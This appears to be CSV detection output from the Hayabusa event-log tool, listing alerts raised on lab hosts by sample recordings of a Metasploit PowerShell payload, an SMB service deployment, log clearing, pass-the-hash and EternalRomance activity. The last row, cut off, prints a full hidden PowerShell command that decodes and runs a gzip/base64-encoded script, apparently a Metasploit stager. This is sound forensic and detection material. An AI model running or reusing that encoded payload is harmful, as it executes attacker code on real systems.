+00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:11:03.032 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:12:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:12:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:13:03.024 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:13:03.024 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:14:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:14:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:15:03.021 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:15:03.021 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:16:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:16:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:17:03.026 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:17:03.026 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:18:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:18:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:19:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:19:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 08:50:53.614 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.780 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.796 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellEx